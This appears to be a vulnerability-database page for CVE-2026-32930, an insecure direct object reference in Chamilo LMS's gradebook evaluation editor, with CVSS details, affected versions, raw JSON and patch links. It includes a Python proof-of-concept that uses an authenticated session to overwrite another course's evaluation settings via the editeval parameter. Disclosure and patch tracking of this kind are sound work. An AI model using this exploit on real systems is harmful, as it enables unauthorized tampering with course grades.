Security Vulnerability Report
中文
CVE-2026-32930 CVSS 7.1 HIGH

CVE-2026-32930

Published: 2026-04-10 18:16:42
Last Modified: 2026-04-17 21:28:37
Source: [email protected]

Description

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:* - VULNERABLE
Chamilo LMS < 1.11.38
Chamilo LMS < 2.0.0-RC.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# POC for CVE-2026-32930 # This script demonstrates how an authenticated teacher can modify # evaluation settings of another course by exploiting the IDOR vulnerability. import requests def exploit_idor(target_url, session_cookie, target_eval_id): # Target endpoint for editing evaluation url = f"{target_url}/main/gradebook/gradebook_edit_eval.php" # Headers with authenticated session headers = { "Cookie": f"PHPSESSID={session_cookie}", "User-Agent": "Mozilla/5.0 (POC-Scanner)" } # The vulnerable parameter 'editeval' allows accessing any evaluation ID params = { "editeval": target_eval_id } # Data payload to modify the evaluation settings payload = { "name": "Hacked Evaluation", "max": "100", "weight": "999" } try: response = requests.post(url, headers=headers, params=params, data=payload) if response.status_code == 200: print("[+] Exploit successful! Evaluation settings likely modified.") print(f"[+] Response length: {len(response.text)}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") # Usage # exploit_idor("http://target-lms.com", "valid_session_id", "1234")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32930", "sourceIdentifier": "[email protected]", "published": "2026-04-10T18:16:42.280", "lastModified": "2026-04-17T21:28:36.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.38", "matchCriteriaId": "A4D0C5D2-6FA0-4532-8E3D-4EA111A50621"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "4AF7661F-C1F7-4CAB-BBDF-FC5BF7F5BEB8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "FE56AF71-9D53-42C6-980D-09E1C418ED87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "01195674-9E1A-4C07-B7D3-0F0CC2E6511B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "BAE63449-5A56-4302-A4BF-F3D19FC96A80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "A84A06F9-5AB7-4703-8153-33AC68882B95"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "B91302A3-53DE-4ED0-BAAB-FE9DA03F8242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "46008D4A-96F7-4E04-8256-E115AAAE3383"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "6E2BCAFF-D44B-4E67-998A-DF855E27606B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "D2E7D018-E4C2-45F5-8D9A-DAC947173607"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "DAF96697-6B6D-459D-9510-E5CEEDC2859B"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.